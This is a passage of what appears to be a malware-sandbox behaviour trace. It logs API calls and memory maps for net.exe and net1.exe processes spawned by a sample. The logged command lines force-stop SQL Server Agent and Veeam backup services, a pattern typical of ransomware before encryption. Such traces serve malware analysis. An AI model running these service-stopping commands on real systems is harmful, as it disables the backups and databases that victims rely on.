returned -5 [0111.943] NetServiceControl (in: servername=0x0, service="SQLAGENT$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x12fdb0 | out: bufptr=0x12fdb0) returned 0x889 [0111.944] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.944] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0111.945] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.947] GetFileType (hFile=0xb) returned 0x2 [0111.947] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0111.947] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x12fc70*=0x1e) returned 1 [0111.947] GetFileType (hFile=0xb) returned 0x2 [0111.948] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0111.948] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x12fc70*=0x2) returned 1 [0111.948] _ultow (in: _Dest=0x889, _Radix=1244384 | out: _Dest=0x889) returned="2185" [0111.948] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.949] GetFileType (hFile=0xb) returned 0x2 [0111.949] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0111.949] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x12fc70*=0x34) returned 1 [0111.949] GetFileType (hFile=0xb) returned 0x2 [0111.950] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0111.950] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x12fc70*=0x2) returned 1 [0111.950] NetApiBufferFree (Buffer=0x324d60) returned 0x0 [0111.950] NetApiBufferFree (Buffer=0x32c120) returned 0x0 [0111.950] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" [0111.950] exit (_Code=2) Process: id = "286" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5c14c000" os_pid = "0x1220" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x10d4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10379 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10380 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10381 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10382 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10383 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10384 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10385 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10386 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10387 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10388 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10389 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10390 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10391 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 10392 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10393 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10394 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10395 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10396 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10397 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10398 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 10399 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10400 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10401 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10402 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10403 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10404 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10405 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10406 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10407 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10408 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10409 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10410 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10411 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10412 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10413 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10414 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10415 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10416 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10441 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 782 os_tid = 0x1238 [0111.919] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f750 | out: lpSystemTimeAsFileTime=0x24f750*(dwLowDateTime=0xf7dc8970, dwHighDateTime=0x1d48689)) [0111.919] GetCurrentProcessId () returned 0x1220 [0111.919] GetCurrentThreadId () returned 0x1238 [0111.919] GetTickCount () returned 0x25afa [0111.919] QueryPerformanceCounter (in: lpPerformanceCount=0x24f758 | out: lpPerformanceCount=0x24f758*=1815883800000) returned 1 [0111.921] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.921] __set_app_type (_Type=0x1) [0111.921] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.921] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.922] GetConsoleOutputCP () returned 0x1b5 [0111.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.951] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.954] sprintf_s (in: _DstBuf=0x24f6f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.954] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.955] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.955] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" [0111.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f490, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.956] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.956] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f6e8 | out: Buffer=0x24f6e8*=0x334d60) returned 0x0 [0111.956] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f6e8 | out: Buffer=0x24f6e8*=0x33c130) returned 0x0 [0111.956] _fileno (_File=0x7fefdba2a80) returned 0 [0111.956] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.956] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.956] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.956] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.956] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.956] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.956] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.956] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.956] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.956] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.956] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.957] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.957] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.957] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.957] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.957] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.957] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.957] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.957] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.957] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.957] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.957] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.957] _wcsicmp (_String1="accounts", _String2="SQLAgent$SYSTEM_BGC") returned -18 [0111.957] _wcsicmp (_String1="computer", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0111.957] _wcsicmp (_String1="config", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0111.957] _wcsicmp (_String1="continue", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0111.957] _wcsicmp (_String1="cont", _String2="SQLAgent$SYSTEM_BGC") returned -16 [0111.957] _wcsicmp (_String1="file", _String2="SQLAgent$SYSTEM_BGC") returned -13 [0111.957] _wcsicmp (_String1="files", _String2="SQLAgent$SYSTEM_BGC") returned -13 [0111.957] _wcsicmp (_String1="group", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.957] _wcsicmp (_String1="groups", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.957] _wcsicmp (_String1="help", _String2="SQLAgent$SYSTEM_BGC") returned -11 [0111.957] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SYSTEM_BGC") returned -11 [0111.957] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0111.957] _wcsicmp (_String1="pause", _String2="SQLAgent$SYSTEM_BGC") returned -3 [0111.957] _wcsicmp (_String1="session", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.957] _wcsicmp (_String1="sessions", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.957] _wcsicmp (_String1="sess", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.957] _wcsicmp (_String1="share", _String2="SQLAgent$SYSTEM_BGC") returned -9 [0111.957] _wcsicmp (_String1="start", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0111.957] _wcsicmp (_String1="stats", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0111.957] _wcsicmp (_String1="statistics", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0111.958] _wcsicmp (_String1="stop", _String2="SQLAgent$SYSTEM_BGC") returned 3 [0111.958] _wcsicmp (_String1="time", _String2="SQLAgent$SYSTEM_BGC") returned 1 [0111.958] _wcsicmp (_String1="user", _String2="SQLAgent$SYSTEM_BGC") returned 2 [0111.958] _wcsicmp (_String1="users", _String2="SQLAgent$SYSTEM_BGC") returned 2 [0111.958] _wcsicmp (_String1="msg", _String2="SQLAgent$SYSTEM_BGC") returned -6 [0111.958] _wcsicmp (_String1="messenger", _String2="SQLAgent$SYSTEM_BGC") returned -6 [0111.958] _wcsicmp (_String1="receiver", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0111.958] _wcsicmp (_String1="rcv", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0111.958] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SYSTEM_BGC") returned -5 [0111.958] _wcsicmp (_String1="redirector", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0111.958] _wcsicmp (_String1="redir", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0111.958] _wcsicmp (_String1="rdr", _String2="SQLAgent$SYSTEM_BGC") returned -1 [0111.958] _wcsicmp (_String1="workstation", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0111.958] _wcsicmp (_String1="work", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0111.958] _wcsicmp (_String1="wksta", _String2="SQLAgent$SYSTEM_BGC") returned 4 [0111.958] _wcsicmp (_String1="prdr", _String2="SQLAgent$SYSTEM_BGC") returned -3 [0111.958] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SYSTEM_BGC") returned -15 [0111.958] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0111.958] _wcsicmp (_String1="server", _String2="SQLAgent$SYSTEM_BGC") returned -12 [0111.958] _wcsicmp (_String1="svr", _String2="SQLAgent$SYSTEM_BGC") returned 5 [0111.958] _wcsicmp (_String1="srv", _String2="SQLAgent$SYSTEM_BGC") returned 1 [0111.958] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SYSTEM_BGC") returned -7 [0111.958] _wcsicmp (_String1="alerter", _String2="SQLAgent$SYSTEM_BGC") returned -18 [0111.958] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SYSTEM_BGC") returned -5 [0111.958] _wcsupr (in: _String="SQLAgent$SYSTEM_BGC" | out: _String="SQLAGENT$SYSTEM_BGC") returned="SQLAGENT$SYSTEM_BGC" [0111.959] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x33ce40 [0112.001] GetServiceKeyNameW (in: hSCManager=0x33ce40, lpDisplayName="SQLAGENT$SYSTEM_BGC", lpServiceName=0xff725750, lpcchBuffer=0x24f608 | out: lpServiceName="", lpcchBuffer=0x24f608) returned 0 [0112.002] _wcsicmp (_String1="msg", _String2="SQLAGENT$SYSTEM_BGC") returned -6 [0112.002] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SYSTEM_BGC") returned -6 [0112.002] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0112.002] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0112.002] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0112.002] _wcsicmp (_String1="redir", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0112.002] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SYSTEM_BGC") returned -1 [0112.002] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0112.002] _wcsicmp (_String1="work", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0112.002] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SYSTEM_BGC") returned 4 [0112.002] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SYSTEM_BGC") returned -3 [0112.002] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SYSTEM_BGC") returned -15 [0112.002] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SYSTEM_BGC") returned -7 [0112.003] _wcsicmp (_String1="server", _String2="SQLAGENT$SYSTEM_BGC") returned -12 [0112.003] _wcsicmp (_String1="svr", _String2="SQLAGENT$SYSTEM_BGC") returned 5 [0112.003] _wcsicmp (_String1="srv", _String2="SQLAGENT$SYSTEM_BGC") returned 1 [0112.003] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SYSTEM_BGC") returned -7 [0112.003] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SYSTEM_BGC") returned -18 [0112.003] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SYSTEM_BGC") returned -5 [0112.003] NetServiceControl (in: servername=0x0, service="SQLAGENT$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x24f610 | out: bufptr=0x24f610) returned 0x889 [0112.004] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0112.004] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0112.005] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0112.006] GetFileType (hFile=0xb) returned 0x2 [0112.006] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f4d8 | out: lpMode=0x24f4d8) returned 1 [0112.007] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f4d0, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x24f4d0*=0x1e) returned 1 [0112.007] GetFileType (hFile=0xb) returned 0x2 [0112.007] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f4d8 | out: lpMode=0x24f4d8) returned 1 [0112.008] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f4d0, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x24f4d0*=0x2) returned 1 [0112.008] _ultow (in: _Dest=0x889, _Radix=2422080 | out: _Dest=0x889) returned="2185" [0112.008] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0112.008] GetFileType (hFile=0xb) returned 0x2 [0112.009] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f4d8 | out: lpMode=0x24f4d8) returned 1 [0112.009] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f4d0, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x24f4d0*=0x34) returned 1 [0112.009] GetFileType (hFile=0xb) returned 0x2 [0112.009] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f4d8 | out: lpMode=0x24f4d8) returned 1 [0112.009] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f4d0, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x24f4d0*=0x2) returned 1 [0112.010] NetApiBufferFree (Buffer=0x334d60) returned 0x0 [0112.010] NetApiBufferFree (Buffer=0x33c130) returned 0x0 [0112.010] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SYSTEM_BGC /y" [0112.010] exit (_Code=2) Process: id = "287" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x60cf5000" os_pid = "0x1224" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10442 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10443 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10444 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10445 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10446 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10447 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10448 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10449 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10450 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10451 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10452 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10453 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10454 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 10455 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10456 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 783 os_tid = 0x1128 Process: id = "288" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6ba14000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], 